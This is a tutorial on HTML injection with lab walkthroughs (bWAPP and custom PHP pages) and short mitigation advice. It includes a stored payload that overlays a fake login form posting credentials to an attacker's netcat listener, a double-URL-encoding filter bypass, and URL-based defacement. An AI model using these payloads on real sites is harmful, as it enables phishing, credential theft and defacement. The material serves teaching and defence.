Comprehensive Guide on HTML Injection
“HTML” is regarded as the skeleton of every web application, as it defines the structure and layout of the hosted content. So have you ever wondered what happens if this anatomy is corrupted with a few simple scripts, or if the structure itself becomes responsible for defacing the web application? In this article, we’ll learn how poorly handled HTML opens the gates for attackers to manipulate web pages and grab sensitive data from users.
Table of Contents
- What is HTML?
- Introduction to HTML Injection
- Impact of HTML Injection
- HTML Injection v/s XSS
- Types of Injection
- Stored HTML
- Reflected HTML
- Reflected GET
- Reflected POST
- Reflected current URL
- Mitigation Steps
What is HTML?
HTML, an abbreviation of “HyperText Markup Language”, is the basic building block of the web and determines how web pages are structured in a web application. HTML is used to design websites that use “HyperText” to include “text inside a text” as a hyperlink, together with a combination of elements that wrap the data items displayed in the browser.
So what are these elements?
“An element is everything in an HTML page, i.e. it consists of the opening tag, the closing tag, and the text content in between.”
HTML tags label pieces of content such as “heading”, “paragraph”, “form”, and so on. They are element names surrounded by angle brackets and come in two types: the “start tag”, also known as the opening tag, and the “end tag”, also known as the closing tag. Browsers do not display these tags but use them to render the content of the web page.
To provide extra information about an element, we use attributes. They reside inside the start tag and come in “name/value” pairs: the attribute name is followed by an “equals sign”, and the attribute value is enclosed in “quotation marks”.
<a href = "http://hackingarticles.in">Hacking Articles </a>
Here “href” is the “attribute name” and “http://hackingarticles.in” is the “attribute value”.
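To see the name/value pairing concretely, here is a minimal Python sketch that feeds the anchor tag above to the standard library's HTML parser and lists each attribute it finds. The class name AttributeLister is made up for this illustration and is not part of the original article.

```python
from html.parser import HTMLParser


class AttributeLister(HTMLParser):
    """Collects (tag, attribute name, attribute value) triples from start tags."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value) pairs taken from the start tag
        for name, value in attrs:
            self.found.append((tag, name, value))


parser = AttributeLister()
parser.feed('<a href = "http://hackingarticles.in">Hacking Articles </a>')
print(parser.found)
```

The parser reports the attribute without its quotation marks, which shows that the quotes only delimit the value and are not part of it.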
Now that we’re aware of the basic HTML terminology, let’s check out the “HTML elements flowchart” and then use these elements to create a simple web page.
Basic HTML Page:
Every web page on the internet is, in one way or another, an HTML file. These are simple plain-text files with a “.html” extension that are saved and then opened in a web browser.
So let’s create a simple web page in Notepad and save it as hack.html:
<html><head><title>Hacking Articles lab</title></head>
<body bgcolor="pink">
<center><h2>WELCOME TO <a href="http://hackingarticles.in">HACKING ARTICLES</a></h2></center>
<br>
<p>Author "Raj Chandel"</p>
</body></html>
Let’s open this “hack.html” file in our browser and see what we have developed.
Great!! We’ve successfully designed our first web page. But how did these tags work for us? Let’s check them out:
- The <html> element is the root element of every HTML page.
- The <head> element holds the meta-information about the document.
- The <title> element specifies a title for the web page.
- The <body> element contains the visible page content; here it has the “bgcolor” attribute set to “pink”.
- The <br> element defines a line break.
- The <h2> element defines a second-level heading.
- The <p> element defines a paragraph.
- The <a> element defines an anchor, which lets us set up a “hyperlink”.
I guess you are now clear on what HTML is, what it is mainly used for, and how to put it together. So let’s look at the major loopholes and learn how attackers inject arbitrary HTML code into vulnerable web pages in order to modify the hosted content.
Introduction to HTML Injection
HTML Injection, also termed “virtual defacement”, is one of the simplest and most common vulnerabilities. It arises when a web page fails to sanitize user-supplied input or validate its output, which allows an attacker to craft payloads and inject malicious HTML code into the application through the vulnerable fields, so that he can modify the web page content and even grab sensitive data.
Let’s take a look at the following scenario and learn how such HTML Injection attacks are executed:
Consider a web application that suffers from an HTML Injection vulnerability and does not validate its input. An attacker who discovers this injects a malicious “HTML login form” with the lure of “Free Movie Tickets” to trick the victim into submitting his sensitive credentials.
Now, when the victim visits that particular web page, he finds the option to claim those “free movie tickets”. When he clicks on it, he is presented with what looks like the application’s login screen but is actually the attacker’s crafted “HTML form”. As soon as he enters his credentials, the attacker captures them through his listener machine, and the victim’s data is compromised.
Impact of HTML Injection
When the input fields of a web page are not properly sanitized, an HTML Injection vulnerability can sometimes lead to Cross-Site Scripting (XSS) or Server-Side Request Forgery (SSRF) attacks. This vulnerability has therefore been reported with a severity level of “Medium” and a “CVSS score of 5.3” under:
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page.
- CWE-79: Improper Neutralization of Input During Web Page Generation.
HTML Injection v/s XSS
Types of Injection
Let’s now dive into the different HTML Injection attacks and check out the ways in which we can deface web pages and capture the victim’s credentials.
Stored HTML
“Stored HTML” is also termed “persistent” because, through this vulnerability, the injected malicious code is permanently stored on the web application’s server, and the server delivers it back to every user who visits the injected web page. When the client then interacts with the payload, which appears to be an official part of the website, the injected HTML code is rendered by the browser.
The most common example of Stored HTML is the “comment” option in blogs, which allows any user to leave feedback in the form of comments for the administrator or other users.
Let’s now try to exploit this stored HTML vulnerability and grab some credentials.
Exploiting Stored HTML
I’ve opened the target IP in my browser and logged in to bWAPP as bee:bug. I’ve then set the “Choose Your Bug” option to “HTML Injection – Stored (Blog)” and hit the hack button.
Now we’ll be redirected to a web page that suffers from an HTML Injection vulnerability and allows the user to submit an entry to the blog, as shown in the screenshot.
Initially, we will create a normal entry as the user “bee” with the text “Hacking Articles”, in order to confirm that the input data is stored in the web server’s database and is then visible in the “Entry” field.
Now let’s inject our malicious payload, which will create a fake user login form on this targeted web page and forward the captured request to our IP.
Enter the following HTML code in the given text area in order to set up the HTML attack.
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid
credentials:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form></div>
From the image below you can see that, as soon as I clicked the “Submit” button, a new login form was displayed on the web page. This login form is now stored on the application’s web server and is rendered every time a victim visits this page, so he will always see a form that looks official to him.
So let’s now start our netcat listener on port 4444 in order to capture the victim’s request.
nc -lvp 4444
Now it’s time to wait until the victim loads this page in his browser and enters his credentials.
Great!! From the above image, you can see that the user “Raj” opened the web page and tried to log in as raj:123.
So let’s get back to our listener and check whether the credentials were captured in the request.
From the image below, you can see that we’ve successfully grabbed the credentials.
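Why does a plain listener see the credentials at all? The injected form declares no method, so the browser submits it with GET and places the field values in the query string of the request line. The Python sketch below parses such a line; the request line itself is an assumed illustration of what the listener might print for raj:123, not output copied from the lab.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical first line of the HTTP request shown by the listener.
captured_request_line = "GET /login.htm?username=raj&password=123 HTTP/1.1"

# An HTTP request line has three space-separated parts.
method, target, version = captured_request_line.split(" ")

# The form fields travel in the query string of the request target.
query = urlsplit(target).query
credentials = {key: values[0] for key, values in parse_qs(query).items()}

print(method, credentials)
```

Because everything of interest sits in the first line of the request, the attacker does not need a real web server behind port 4444.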
Reflected HTML
Reflected HTML, also known as “non-persistent”, occurs when the web application responds immediately to the user’s input without validating what the user entered, which lets an attacker inject browser-executable code into that single HTML response. It is termed “non-persistent” because the malicious code is not stored on the web server, so the attacker needs to send the malicious link to the user, for example through phishing.
A Reflected HTML vulnerability can often be found in a website’s search feature: the attacker types some arbitrary HTML code into the search box and, if the website is vulnerable, the result page renders that HTML in its response.
Reflected HTML is basically of three types:
- Reflected HTML GET
- Reflected HTML POST
- Reflected HTML Current URL
Before getting our hands wet by exploiting the Reflected HTML labs, let us recall that with the GET method we request data from a specific source, whereas the POST method is used to send data to a server in order to create or update a resource.
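The practical difference for the labs that follow is where the form data travels. As a rough Python sketch, the same two fields are attached to a GET request (in the URL) and to a POST request (in the body). The endpoint http://example.test/feedback.php and the field names are assumptions made for illustration, and nothing is actually sent over the network.

```python
from urllib.parse import urlencode
from urllib.request import Request

fields = {"name": "Raj Chandel", "feedback": "Good"}
encoded = urlencode(fields)  # name/value pairs joined with "&"

# Hypothetical endpoint, used only to build the request objects.
endpoint = "http://example.test/feedback.php"

# GET: the pairs are appended to the URL as a query string.
get_request = Request(endpoint + "?" + encoded)

# POST: the same pairs are carried in the request body instead.
post_request = Request(endpoint, data=encoded.encode("ascii"))

print(get_request.get_method(), get_request.full_url)
print(post_request.get_method(), post_request.full_url, post_request.data)
```

With GET the payload is visible in, and can be delivered through, a link; with POST the URL stays clean and the data has to be submitted by a form or an intercepting proxy.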
Reflected HTML GET
Here, we’ve created a web page that lets the user submit “feedback” along with his “name”.
So, when the user “Raj Chandel” submits his feedback as “Good”, a message is displayed: “Thanks to Raj Chandel for your valuable time.”
This instant response and the “name/value” pairs in the URL suggest that the page might be vulnerable to HTML Injection and that the data is sent using the GET method.
So let’s now inject some HTML code into this “form” to confirm it. Enter the name wrapped in HTML heading tags in the “Name” field and set Feedback to “Good”.
From the image below you can see that the user’s name “Raj Chandel” has been rendered as a heading in the response message.
Wondering why this happened? Let’s check out the following code snippet.
To reflect the message on the screen easily, the developer didn’t set up any input validation, i.e. he simply “echoes” the “Thanks” message, including the input name taken from the “$_GET” variable.
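The original page is written in PHP, so the following is only a Python sketch of the behaviour just described: the submitted name is concatenated into the response without any validation. The function name thanks_message and the surrounding <p> tag are assumptions for illustration.

```python
def thanks_message(name: str) -> str:
    """Mimics an unvalidated echo: the name is pasted into the HTML as-is."""
    return "<p>Thanks to " + name + " for your valuable time.</p>"


# A normal name produces the expected message.
print(thanks_message("Raj Chandel"))

# A name that contains markup reaches the browser as markup.
print(thanks_message("<h1>Raj Chandel</h1>"))
```

Since the server cannot tell its own tags from the ones that arrived in the name, the browser renders both.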
“There are times when the developer sets up some validation on the input fields, which reflects our HTML code back onto the screen without rendering it.”
From the image below you can see that when I tried to submit HTML code in the name field, it was echoed back as plain text:
So has the vulnerability been patched here?
Let’s check this out by capturing the outgoing request with our helping hand “Burp Suite” and sending the captured request directly to the “Repeater” tab.
In the “Repeater” tab, when I clicked the “Go” button to check the generated response, I found that my HTML characters had been HTML-encoded:
So I copied the complete HTML code “<a href="http://hackingarticles.in"><h2>Raj</h2></a>” and pasted it into the “Decoder” tab. Then, from the right-hand panel, I clicked on “Encode as” and chose the URL option.
Once we get the encoded output, we’ll pass it through “Encode as” URL once more to get the double URL-encoded format.
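The two encoding passes can be reproduced outside Burp. This is a small Python sketch using the standard library; Burp's Decoder may percent-encode more characters than quote() does, but decoding either form twice gives back the same payload.

```python
from urllib.parse import quote, unquote

payload = '<a href="http://hackingarticles.in"><h2>Raj</h2></a>'

# First pass: "<" becomes "%3C", ">" becomes "%3E", and so on.
encoded_once = quote(payload, safe="")

# Second pass: every "%" from the first pass becomes "%25".
encoded_twice = quote(encoded_once, safe="")

print(encoded_once)
print(encoded_twice)

# Two rounds of decoding are needed to recover the original markup.
print(unquote(unquote(encoded_twice)) == payload)
```

After a single round of decoding, the double-encoded value still contains no literal angle brackets, which is what lets it slip past a filter that only looks for “<” and “>”.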
Let’s now try this out: copy the complete double-encoded string and paste it into the “name=” parameter of the request in the Repeater tab.
Click on the Go button to check the generated response.
Great!! From the image below, you can see that we’ve successfully manipulated the response.
Now make the same changes in the Proxy tab and hit the “Forward” button. From the image below you can see that we’ve defaced this web page too, despite its validated fields.
Let’s check out the code snippet to see where the developer performed input validation:
From the image below you can see that the developer wrote a function named “hack” that takes the variable $data. It replaces “<” and “>” with “&lt;” and “&gt;”, first in $data and then in $input, and then applies the built-in PHP function urldecode to $input to decode the URL.
From the image below you can see that the developer applied the hack function to the name field.
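To make the flaw visible, here is a Python sketch of that filter, assuming the order described above: the angle brackets are replaced first and the URL decoding happens afterwards. The original is PHP; unquote() stands in for urldecode, and the short payload is chosen only for readability.

```python
from urllib.parse import quote, unquote


def hack(data: str) -> str:
    # Step 1: replace only the angle brackets with HTML entities.
    cleaned = data.replace("<", "&lt;").replace(">", "&gt;")
    # Step 2: URL-decode afterwards, which can bring raw brackets back.
    return unquote(cleaned)


payload = "<h2>Raj</h2>"

# The server already decodes the request once before the application sees
# the parameter, so a double-encoded payload arrives here single-encoded.
single_encoded = quote(payload, safe="")

print(hack(payload))         # brackets were present, so they become entities
print(hack(single_encoded))  # brackets were hidden as %3C / %3E and survive
```

Decoding after filtering means the filter inspects a different string from the one that is finally echoed; decoding first, or escaping at the moment of output, would close this gap.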
Reflected HTML POST
Similar to the “GET” web page, the “Name” and “Feedback” fields are vulnerable here too. Since the POST method is used, the form data won’t be displayed in the URL.
Let’s try to deface this web page again, but this time we’ll add an image rather than static text:
<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">
From the image below, you can see that the “Ignite Technologies” logo has been placed on the screen. An attacker could likewise inject other media formats such as videos, audio, or GIFs.
Reflected HTML Current URL
Can a web application be vulnerable to HTML Injection with no input fields on the web page?
Yes, it’s not necessary to have an input field like a comment box or search box. Some applications display the current URL on their web pages and might be vulnerable to HTML Injection, since in such cases the URL itself acts as the input field.
From the above image, you can see that the current URL is being displayed on the web page as “http://192.168.0.16/hack/html_URL.php”. So let’s take advantage of this and see what we can grab.
Fire up “Burp Suite” and capture the ongoing HTTP request.
Now let’s manipulate the URL in this request by injecting our HTML code into it.
Click on the Forward button to check the result in the browser.
Great!! From the image below you can see that we have successfully defaced the website by simply injecting our desired HTML code into the web application’s URL.
Let’s have a look at its code and see how the developer displays the current URL on the screen.
Here the developer used the PHP superglobal $_SERVER to capture the current page URL. He took the hostname from “HTTP_HOST” and the requested resource location from “REQUEST_URI”, and placed the combined result in the $url variable.
In the HTML section, he simply echoes the $url variable without any validation in order to display the message with the URL.
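A Python sketch of the same logic follows, with a dictionary standing in for PHP's $_SERVER. The function names, the wording of the message, and the injected path are assumptions for illustration; only the two keys and the base URL come from the walkthrough above.

```python
def current_url(server: dict) -> str:
    """Rebuilds the requested URL from the host and the request URI."""
    return "http://" + server["HTTP_HOST"] + server["REQUEST_URI"]


def render(url: str) -> str:
    """Echoes the URL into the page without any validation."""
    return "<p>Your current URL: " + url + "</p>"


# Hypothetical request whose path has been extended with markup.
server = {
    "HTTP_HOST": "192.168.0.16",
    "REQUEST_URI": "/hack/html_URL.php/<h1>Hacked</h1>",
}

page = render(current_url(server))
print(page)
```

Both values are taken from the incoming request, so they are user-controlled input just like a form field and need the same treatment before being echoed.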
Mitigation Steps
- The developer should set up a script that filters HTML metacharacters from user input.
- The developer should implement functions that validate user input so that it does not contain any tag that could lead to virtual defacement.
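One common way to apply the first point is to encode the metacharacters at the moment the value is written into the page. The sketch below uses Python's standard html.escape; in a PHP application such as the ones in this article, htmlspecialchars plays the equivalent role. The function name safe_thanks_message is made up for this example.

```python
from html import escape


def safe_thanks_message(name: str) -> str:
    """Encodes <, >, &, and quotes so the name is shown as text, not markup."""
    return "<p>Thanks to " + escape(name, quote=True) + " for your valuable time.</p>"


print(safe_thanks_message("Raj Chandel"))
print(safe_thanks_message("<h1>Raj Chandel</h1>"))
```

Escaping on output, after every decoding step has already run, means the browser displays the injected tags as literal text instead of rendering them.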
Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security.